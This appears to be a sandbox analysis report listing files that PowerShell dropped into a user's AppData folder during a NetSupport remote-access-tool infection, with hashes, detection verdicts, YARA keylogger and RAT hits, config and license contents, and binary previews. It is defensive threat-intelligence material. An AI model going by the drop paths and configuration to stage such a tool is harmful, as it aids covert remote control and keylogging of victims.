                                                                                                                                                Size (bytes):19012
                                                                                                                                                Entropy (8bit):5.502916693653022
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:u8kjr8ZMuAh/AJ2t696XNqabssp2eqf05hETwOpx4toaxfbh69xy:/Wr0MI2EcXNqaBAeD7MxSbhj
                                                                                                                                                MD5:B5298407D93E2FCF0383361D9C1AFCC3
                                                                                                                                                SHA1:BD3CC4A674F9BD018B234F2139E78649971E1EBE
                                                                                                                                                SHA-256:2D121F444144E69334A70EC069987CEB317DA63A57646AB6BA830BD4498B24EC
                                                                                                                                                SHA-512:2460497C5335D5C2A142AD78DA7631A188486BAB10330DC502D712C5307FA5CB8D28E98632C5520B6D0F2EC4C38A2924AE04AEABEE30091F7820FE1C49DDB4BC
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview:@...e...............#................................@..........H...............o..b~.D.poM...3..... .Microsoft.PowerShell.ConsoleHostD...............4..7..D.#V.....`.......System.Management.Automation0.................Vn.F..kLsw..........System..4...............<."..Ke@...j..........System.Core.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.4.................%...K... ...........System.Xml..@................z.U..G...5.f.1........System.DirectoryServices<................t.,.lG....M...........System.Management...4...............&.QiA0aN.:... .G........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...D....................+.H..!...e........System.Configuration.Ins

                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_febnwrhp.qfn.ps1

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):60
                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:high, very likely benign file
                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jlvidhcj.5kh.psm1

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):60
                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:high, very likely benign file
                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\CXCC.zip

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2359638
                                                                                                                                                Entropy (8bit):7.997512736663703
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:49152:a51ZlWlEDThXBJOhHvh6J6h2SFFGf0RBNTQfYc9jh23eWeB3/YSBm7WIqRRakTSs:E17FXa/hRFY89YYc9jh23redpmQRv
                                                                                                                                                MD5:7A5CC8DC4397674526B773D3BF4669D3
                                                                                                                                                SHA1:4F0576E5406DA1B476E070E1AF6C1A6DC616112E
                                                                                                                                                SHA-256:98EC780E46CD137C3C88CA3403063525C037196840092FF58309F74A82851849
                                                                                                                                                SHA-512:36A4918069718E6B30E5E69E4B63C0FD03BB573BAFEBE25EF50D38589C6641D1468A6B518C28B0B9CC0FE859EF6A9590919CDE9A36022C506B4908DA7BAF6701
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PK.........DWW..%.&l..........client32.exe.|.xT.....N..".R....A.W..@........Tj.$...Q.@... ...7!...@..iJ.......;3....R..~.....;g...3gfnx...T.@......b../....d.@...n{...ts....5d.....]%.i..v...:3lZ..i]G.9v.:...\__...F.).C....(..B..t..P.f....&..9..e.k9.:.K.X...8..`.@...Oph.@W...B.p....N.]A.....A^...!..Y..T...+..t........`..KUg.....`..]w..=k...g...7.......4<..=f..|..8T.."...z..:..ae>s.L.(....f.U.%=.).Iq.....T..px-..8G.G...`8.>{#.=....&B..G..)t........uY:R0..C.....C.........G......1r.e..K5HMop..ZJ..6.&...fM.........m....G..W.I0....hb.."NDS5...>MTz-.".i.....v..[..JC.dC........^4....4.W.U.SZ.'..........O...C.O.+..X...Cs.)S.L`3'8t.....Y..Te....~aS.G...M......9..g......0}.|-.;..N%....Hi......$.....kC..t..`..,..!&..X..$.6k..v....o_.I.......x......?_..'.A..../`S.b...u.].....t..9.6...g.l..|.2...Nte.}.N....]........)d..Q{.>g.p?G.O...g.......S.Z*.-.....^.......[......V..i...V.oh.~l+......R9.}W.F..q....4...._`G.CK..u.@l.....7l.W/..b.&... H.1..I.........

                                                                                                                                                C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\HTCTL32.DLL

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):328056
                                                                                                                                                Entropy (8bit):6.7547459359511395
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:Hib5YbsXPKXd6ppGpwpbGf30IVFpSzyaHx3/4aY5dUilQpAf84lH0JYBAnM1OKB:Hib5YbsXioEgULFpSzya9/lY5SilQCfR
                                                                                                                                                MD5:C94005D2DCD2A54E40510344E0BB9435
                                                                                                                                                SHA1:55B4A1620C5D0113811242C20BD9870A1E31D542
                                                                                                                                                SHA-256:3C072532BF7674D0C5154D4D22A9D9C0173530C0D00F69911CDBC2552175D899
                                                                                                                                                SHA-512:2E6F673864A54B1DCAD9532EF9B18A9C45C0844F1F53E699FADE2F41E43FA5CBC9B8E45E6F37B95F84CF6935A96FBA2950EE3E0E9542809FD288FEFBA34DDD6A
                                                                                                                                                Malicious:true
                                                                                                                                                Yara Hits:
                                                                                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\HTCTL32.DLL, Author: Joe Security
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 13%
                                                                                                                                                Joe Sandbox View:
                                                                                                                                                • Filename: update.js, Detection: malicious, Browse
                                                                                                                                                • Filename: Update.js, Detection: malicious, Browse
                                                                                                                                                • Filename: update.js, Detection: malicious, Browse
                                                                                                                                                • Filename: updates.js, Detection: malicious, Browse
                                                                                                                                                • Filename: updates.js, Detection: malicious, Browse
                                                                                                                                                • Filename: Update 124.0.6367.158.js, Detection: malicious, Browse
                                                                                                                                                • Filename: updates.js, Detection: malicious, Browse
                                                                                                                                                • Filename: Update 124.0.6367.158.js, Detection: malicious, Browse
                                                                                                                                                • Filename: Update_124.0.6367.158.js, Detection: malicious, Browse
                                                                                                                                                • Filename: MDE_File_Sample_c035ea05c53efc10b65ede03b5550188cbb2e484.zip, Detection: malicious, Browse
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ ...A...A...A.......A...9...A...A..gA....1..A....0.A.......A.......A.......A..Rich.A..........PE..L.....V...........!.................Z.......................................P......._....@......................... ...k....y..x.......@...............x).......0..................................._..@............................................text............................... ..`.rdata..............................@..@.data....f.......(...v..............@....rsrc...@...........................@..@.reloc..b1.......2..................@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\LogoDev.png

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:PNG image data, 600 x 600, 8-bit/color RGBA, non-interlaced
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):24504
                                                                                                                                                Entropy (8bit):7.872865717955356
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:qSVmAf6Ft8Itb+e2b9tdTwEy9kXs6vWZZCbiXSeEO/12Hb40yrWSbN8qtA:qImAfe7gx3y6MZC2CeV2747zbN8
                                                                                                                                                MD5:B8F553FBD3DC34B58BC77A705711023D
                                                                                                                                                SHA1:4AB1052F906FDA96F877E398426DA5646574C878
                                                                                                                                                SHA-256:2761C60263A2919B856915BDD2A0604B7F0E56E59D893AB13CCCEF2B7C967229
                                                                                                                                                SHA-512:15A1DF0DBB06B4BB64A2B8CD7AD22578292D5ECDEC64303350E027F9F87FA8A825CB1CC97F94862D8C235C85B0C79A4FEABFB89D9E0B77BE62AAB25785122A60
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:.PNG........IHDR...X...X......f...._.IDATx........................................................................................................................................................................................................................................................f...:.(L..A!..].'twW..3.2 ..........'k.]Kd.|...mz..U...Tu.L..~.W.Wc......................rv.iv%.q=....u..>.o.......k.y.wo........ .,...~..U..._.7/g.........m.....*w.`........p.....8...q.,.,.g....:Q.Rt....Ga.............Z..S+.....=.,....T.Ew.....0U..`.....S.......w....Va..#.|Mo.....eY.eY....m^....r.P..S{#......D.I.y..K.&&9....@...u.^...D.....U..l.keY.eY....rv.]..H..A....^..RpQ.)@,.Im..s.~.U.....,j....._m?.V...z95l}.,.,.P....b..R.>rV.Q_m.0....(.b..@.,./.T[.S;.X....`..w.,...j.o..M.......~^......0.8.....$][=`.V.)..O..1....+...3...eY.e.[.]....s...z.E\.I!G..;).'...d.m>..+w.M.=X.S......g.o.~0........j.{.hY.eY.7.................G..e(K...y..IL.F)g..{.....Z.J}...qn..+.%

                                                                                                                                                C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\NSM.LIC

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):195
                                                                                                                                                Entropy (8bit):4.924914741174998
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:O/oPITDKHMoEEjLgpVUK+Odfu2M0M+ZYpPM/iotqO2La8l6i7s:XAyJjjqVUKHdW2MdRPM/iotq08l6J
                                                                                                                                                MD5:E9609072DE9C29DC1963BE208948BA44
                                                                                                                                                SHA1:03BBE27D0D1BA651FF43363587D3D6D2E170060F
                                                                                                                                                SHA-256:DC6A52AD6D637EB407CC060E98DFEEDCCA1167E7F62688FB1C18580DD1D05747
                                                                                                                                                SHA-512:F0E26AA63B0C7F1B31074B9D6EEF88D0CFBC467F86B12205CB539A45B0352E77CE2F99F29BAEAB58960A197714E72289744143BA17975699D058FE75D978DFD0
                                                                                                                                                Malicious:true
                                                                                                                                                Preview:1200..0x3ca968c5....[[Enforce]]....[_License]..control_only=0..expiry=01/01/2028..inactive=0..licensee=XMLCTL..maxslaves=9999..os2=1..product=10..serial_no=NSM303008..shrink_wrap=0..transport=0..

                                                                                                                                                C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\NSM.ini

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:Generic INItialization configuration [Features]
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):6458
                                                                                                                                                Entropy (8bit):4.645519507940197
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:B6pfGAtXOdwpEKyhuSY92fihuUhENXh8o3IFhucOi49VLO9kNVnkOeafhuK7cwo4:BnwpwYFuy6/njroYbe3j1vlS
                                                                                                                                                MD5:88B1DAB8F4FD1AE879685995C90BD902
                                                                                                                                                SHA1:3D23FB4036DC17FA4BEE27E3E2A56FF49BEED59D
                                                                                                                                                SHA-256:60FE386112AD51F40A1EE9E1B15ECA802CED174D7055341C491DEE06780B3F92
                                                                                                                                                SHA-512:4EA2C20991189FE1D6D5C700603C038406303CCA594577DDCBC16AB9A7915CB4D4AA9E53093747DB164F068A7BA0F568424BC8CB7682F1A3FB17E4C9EC01F047
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:..[General]..ClientParams=..CLIENT32=..Installdir=..NOARP=..SuppressAudio=......[Features]..Client=1..Configurator=..Control=..Gateway=..PINServer=..RemoteDeploy=..Scripting=..Student=..TechConsole=..Tutor=......[StartMenuIcons]..ClientIcon=..ConfigIcon=..ControlIcon=..RemoteDeployIcon=..ScriptingIcon=..TechConsoleIcon=..TutorIcon=......[DesktopIcons]..ControlDeskIcon=..TechConsoleDeskIcon=..TutorDeskIcon=............; This NSM.ini file can be used to customise the component selections when performing a silent installation of the product.....; Client=<1/Blank>..; e.g...; Client=1..; Controls whether the client component is installed (1) on the target machine or not (Blank)..;....; CLIENT32=<blank/not blank>..; e.g...;. CLIENT32=..;. Setting this to anything causes the Client Service (if installed) to be set to manual start rather than automatic..;....; ClientIcon=<1/Blank>..; e.g...; ClientIcon=1..; Controls whether shortcut icons are placed on t

                                                                                                                                                C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\PCICHEK.DLL

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):18808
                                                                                                                                                Entropy (8bit):6.292094060787929
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:dogL7bo2t6n76RRHirmH/L7jtd3hfwjKd3hfwB7bjuZRvI:dogL7bo2YrmRTAKT0iTI
                                                                                                                                                MD5:104B30FEF04433A2D2FD1D5F99F179FE
                                                                                                                                                SHA1:ECB08E224A2F2772D1E53675BEDC4B2C50485A41
                                                                                                                                                SHA-256:956B9FA960F913CCE3137089C601F3C64CC24C54614B02BBA62ABB9610A985DD
                                                                                                                                                SHA-512:5EFCAA8C58813C3A0A6026CD7F3B34AD4FB043FD2D458DB2E914429BE2B819F1AC74E2D35E4439601CF0CB50FCDCAFDCF868DA328EAAEEC15B0A4A6B8B2C218F
                                                                                                                                                Malicious:true
                                                                                                                                                Yara Hits:
                                                                                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\PCICHEK.DLL, Author: Joe Security
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                                Joe Sandbox View:
                                                                                                                                                • Filename: update.js, Detection: malicious, Browse
                                                                                                                                                • Filename: Update.js, Detection: malicious, Browse
                                                                                                                                                • Filename: update.js, Detection: malicious, Browse
                                                                                                                                                • Filename: updates.js, Detection: malicious, Browse
                                                                                                                                                • Filename: updates.js, Detection: malicious, Browse
                                                                                                                                                • Filename: Update 124.0.6367.158.js, Detection: malicious, Browse
                                                                                                                                                • Filename: updates.js, Detection: malicious, Browse
                                                                                                                                                • Filename: Update 124.0.6367.158.js, Detection: malicious, Browse
                                                                                                                                                • Filename: Update_124.0.6367.158.js, Detection: malicious, Browse
                                                                                                                                                • Filename: MDE_File_Sample_c035ea05c53efc10b65ede03b5550188cbb2e484.zip, Detection: malicious, Browse
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Yu....i...i...i.......i..Z...i.......i......i......i..l....i...h.~.i......i......i......i.......i.Rich..i.................PE..L....A.W...........!......................... ...............................`.......U....@.........................@#..r...h!..P....@............... ..x)...P......P ............................... ..@............ ..D............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\PCICL32.DLL

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):3740024
                                                                                                                                                Entropy (8bit):6.527276298837004
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:49152:0KJKmPEYIPqxYdoF4OSvxmX3+m7OTqupa7HclSpTAyFMJa:0KJ/zIPq7F4fmXO8u6kS+y/
                                                                                                                                                MD5:D3D39180E85700F72AAAE25E40C125FF
                                                                                                                                                SHA1:F3404EF6322F5C6E7862B507D05B8F4B7F1C7D15
                                                                                                                                                SHA-256:38684ADB2183BF320EB308A96CDBDE8D1D56740166C3E2596161F42A40FA32D5
                                                                                                                                                SHA-512:471AC150E93A182D135E5483D6B1492F08A49F5CCAB420732B87210F2188BE1577CEAAEE4CE162A7ACCEFF5C17CDD08DC51B1904228275F6BBDE18022EC79D2F
                                                                                                                                                Malicious:true
                                                                                                                                                Yara Hits:
                                                                                                                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\PCICL32.DLL, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\PCICL32.DLL, Author: Joe Security
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........J.>N+.mN+.mN+.m.eAmL+.mU.Gmd+.m!]rmF+.mU.EmJ+.mGSZmA+.mGS]mO+.mGSJmi+.mN+.m.(.mU.rm.+.mU.sm.+.mU.BmO+.mU.CmO+.mU.DmO+.mRichN+.m........................PE..L......X...........!.....(...$ .............@................................9.....Y.9.............................p................p................8.x)...`7.p....Q.......................c......@c..@............@..(.......`....................text...l'.......(.................. ..`.rdata..s....@.......,..............@..@.data....%... ......................@....tls.........P......................@....hhshare.....`......................@....rsrc........p......................@..@.reloc...3...`7..4....6.............@..B................................................................................................................................................................................................

                                                                                                                                                C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\Setup\2CEE836C30F61F46s

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):3484
                                                                                                                                                Entropy (8bit):7.953931162498908
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:ZM4/EjaJuetX1hDnE9g8sxt+JOL28vWN8FdWDo8:ZMFGJpThj6g8/JOFuNodWDo8
                                                                                                                                                MD5:779941310B13AC31BBA246B943B014D3
                                                                                                                                                SHA1:603B7A0CE3B86E96DF1E4B73D3940C42C24EBB6F
                                                                                                                                                SHA-256:DCE9CD258794C205A79F30E5E4029B4ECB32C28657A78D8FCFC41715099F0507
                                                                                                                                                SHA-512:3534923A456CB85EA5C64809A9B9BF571FCCF68AAD2512B05C935D09969E01EF7EB54AA59667DE382CC6FAEFB9BDBAAF6E6FE94E235460FFF6B176913EC60173
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:TDF$.^L......v..........Cg....._0.x.i...[ k..!....)E...0.Lm..8..6.a.[.......q..#.:Y..'.*S...m+$T....L8..t#..[..:6|....f.]....wWB..o.M.._.r....9.y.o.B.w)..{.N.J!.%.cL).X.........~ek.&I.n6...%%xd..n:.....z}:.....KY..Am..P9..Y...q.z.......31.....9.....2C...R.....}..){..6Z/Q.aF.;..x.....G.z_..~BKTU.+.5.-.....Ke.pUm&.q...b.8..4..!......([.!e.^.;...E.\A...pM...HE.....-...cN................+...."..k....Ez..?2&@d...g.W^....RA.??.K......2..'....r...:.^N%..~..)..8..w...#...H.S$d........o$.t.HA3.3....g.@.x.O...'(.1.d..>....DG.Ow=.1..S3.7.7.....A........."at......M_...K..??.)E~..HF.;.t+...T.d...C.+.TG.Oov....F...[.U.l.....I....x.>.yp..-._e..C.g.6....0T...g.7...p..n..'.7.?8..W.R}D.8..J45s......a3.V...R....=n.@......[..8.29(.0..%...v....e.W.e....C,..C...wi...E..Xy'......f..v...T..i.....<R(|...WO.<.KO......T.Y-.n....-..4.-.{.....TSu."...".0..5....Y.a....2.@C.z......3..qJF.N.=.d.e.>I.M..f...#8.c|.....)4...Tv@".ac..3..C.....`<}..U..i.e.0.N

                                                                                                                                                C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\Setup\A88D1CCE15181E1Ds

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):78460
                                                                                                                                                Entropy (8bit):7.997585601529533
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:1536:4tXd1n3DHyLO1Xs+2DzeZ2PNkVSEilHoKmD8tQMODAGesXcZktqfESEH:6XTzS2wyZukVSEMbwI3RsXc2twESEH
                                                                                                                                                MD5:918AEF560B494CC4ECF6724FBCF8A61E
                                                                                                                                                SHA1:2F2B51532AEDF0936E7F8940C9F6CF356E37A3DD
                                                                                                                                                SHA-256:70F0C376F0B37F4795964775DD976704D0F26B28442CF3E9694334DFE708FE8E
                                                                                                                                                SHA-512:89BAB306CCF2665FA1956DCA2A77C768DF1DCA892AE16E66281BD6735D433C5467088A9C7465CA5F6CA4C56247B23B39A9ED7C7F11F079190A74FE6AF289D1DC
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:TDF$.^L...2`..N.6.I='.u...e.3..).......~...P...S.K.....P..5..g$o..].!.9..M.H...r...9@...O..!.......R?.....;{.....2S.Th...V..N..t..~$a`.V.Yp...=..D..Md(J},[P....a3.9=..V.. ...d...!.......|-..q.J..I..x.[7.... ..5e.....xX.<.....K-...~..&.....;......q)...6......99..q.n..W.p..w...ZT..H.$.g...9....J`.07.f.W..Ot.....(..9B.<..........n.8.M....^..P$..z.....{..m..\Szx..v.@..d@...m.v.5.(.o1..^[..j.yb...~.yEpqu..)...E...-..9...j..:..f.......Aa$OC..t..vM.J}.<.....Z.H.0....{...#R.EGS?.....yK. ....]\.. .YY?,..r*6d...........e(..X..Y.zu.[5".&E.....&....OG-..;..0...Yl*..R..i.c..5......).....<5;....+O\ O....`...[.....U.|q......(.mKm.......!._...a=.A_7H.3..bjM.9.1..@...".L..v./6.hx...o..y...a..p.?_&...L...qx.a.......'...".Q..e=;.3...i3ihR....7YkU...>...[.=Y..Dl....:."XD.&....f]..@.\.....[.....j~.Q.4..J\C.....,:....%]H....A.8DY#{...j..;V..4h..JX.X.0.=.&O.bo......'.H.taA.c...DT.Gb..E.~.xw0?y.UY...R..H...............C.%t'....H.Z.a./t...)>...C.sV.........$.5Q..ZO.(

                                                                                                                                                C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\Setup\CC88C062DAB6233Fs

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):124
                                                                                                                                                Entropy (8bit):6.322224310575577
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:9u9FiYOI/3nWMA8gJtu+eMTb2bssqIKF2D9mO2h7N+n:Mi9I/WdPJTb2LqIEnn+n
                                                                                                                                                MD5:80F10934DE31078DB583AF6C314B036F
                                                                                                                                                SHA1:67B66079743AADB7C917361B4F5241F1DE078E1A
                                                                                                                                                SHA-256:83A9F546EDF1056B2EFFB0221444CCFE94DF6E72D0D6E1D9540B3EC050598872
                                                                                                                                                SHA-512:C117E85825A62585684E2D3FEA13AE188E25366B5B044DE9A93A246DADD3345E14088C41C63104EEEE2FDA7BE1BD50BC959E9560E0177F88DC785B10EF6BADC1
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:TDF$.^L....`....!..V...Y6.....%hz....9...).A..lH.[.H.idlH{)...V.B/.J..oHKy.."}.O.P.X..Z.B....^q.....Hz...K..d....6.<.

                                                                                                                                                C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\Setup\Sigma\Advertising

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:ASCII text
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2463
                                                                                                                                                Entropy (8bit):4.467188346618147
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:XZfQr+iDzuMbRmWf2/wu8I6nzsCEak0V9OTG3NOirrY:XZ473RBfiw/HzsCH9o/yY
                                                                                                                                                MD5:326DDFFC1F869B14073A979C0A34D34D
                                                                                                                                                SHA1:DF08E9D94AD0FAD7CC7D2D815EE7D8B82EC26E63
                                                                                                                                                SHA-256:D4201EFD37AEC4552E7AA560A943B4A8D10D08AF19895E6A70991577609146FB
                                                                                                                                                SHA-512:3822E64CA9CF23E50484AFCC2222594B4B2C7CD8C4E411F557ABEA851AE7CBD57F10424C0C9D8B0B6A5435D6F28F3B124C5BC457A239F0A2F0CAF433B01DA83F
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:4dex.io/.ebaystatic.com/.widespace.com/.trafficjunky.net/.minutemedia-prebid.com/.programattik.com/.00px.net/.tsyndicate.com/.ownpage.fr/.ansira.com/.bfmio.com/.adsquare.com/.smct.io/.fengkongcloud.com/.pubwise.io/.admixer.net/.kameleoon.eu/.adelement.com/.fksnk.com/.ie8eamus.com/.aniview.com/.audrte.com/.insurads.com/.brid.tv/.polarcdn-pentos.com/.6sc.co/.ad.gt/.adskeeper.com/.cheqzone.com/.hybrid.ai/.adentifi.com/.cloud-media.fr/.justpremium.com/.refersion.com/.commander1.com/.cootlogix.com/.selectmedia.asia/.sddan.com/.a-mo.net/.2mdnsys.com/.presage.io/.2trk.info/.adnet.de/.dynata.com/.bidtheatre.com/.ufpcdn.com/.curalate.com/.digitaleast.mobi/.moatpixel.com/.yellowblue.io/.datamind.ru/.bumlam.com/.relevant-digital.com/.medialead.de/.iivt.com/.flux.jp/.adtelligent.com/.fqtag.com/.adalliance.io/.wpncdn.com/.webvisor.org/.kameleoon.io/.playwire.com/.visx.net/.gnezdo.ru/.otto.de/.socdm.com/.snigelweb.com/.powerad.ai/.kitewheel.com/.affec.tv/.basis.net/.servenobid.com/.tappx.com/.indexw

                                                                                                                                                C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\Setup\Sigma\LICENSE

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):66
                                                                                                                                                Entropy (8bit):3.99590382426697
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:aeBX+4AuXEJOpKPudp:3XVAuXEs+udp
                                                                                                                                                MD5:5B7BAF861A48C045D997992424B5877B
                                                                                                                                                SHA1:2B2BD9A13AFE49748ABF39FAF9EB29ED658F066E
                                                                                                                                                SHA-256:44071E0FCFFB9A9A32E8FA7010BB18DBC41AFD0B176F81BF700B15B638A88A51
                                                                                                                                                SHA-512:4820B41AA5FF4D934A583E1F0B93B1512631102BB2DFDB74792A2F0DCF9907DA7680C02A5DDD2492A1E6D58CDADA3453D9E38BB8DEAB6CE831FF36A7F8DE016C
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:Licensed under a separate commercial license from Disconnect, Inc.

                                                                                                                                                C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\Setup\Sigma\Staging

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:ASCII text
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):16528
                                                                                                                                                Entropy (8bit):4.551178727174085
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:lMFqdq0kM55olQws9gsLW4nMFCw8oaj7CQB:lGOqPM5mlQXgeWaMFvanCs
                                                                                                                                                MD5:39BDF35AC4557A2D2A4EFDEEB038723E
                                                                                                                                                SHA1:9703CA8AF3432B851CB5054036DE32F8BA7B083F
                                                                                                                                                SHA-256:04441A10B0B1DEEE7996E298949AC3B029BD7C24257FAF910FE14F9996BA12AE
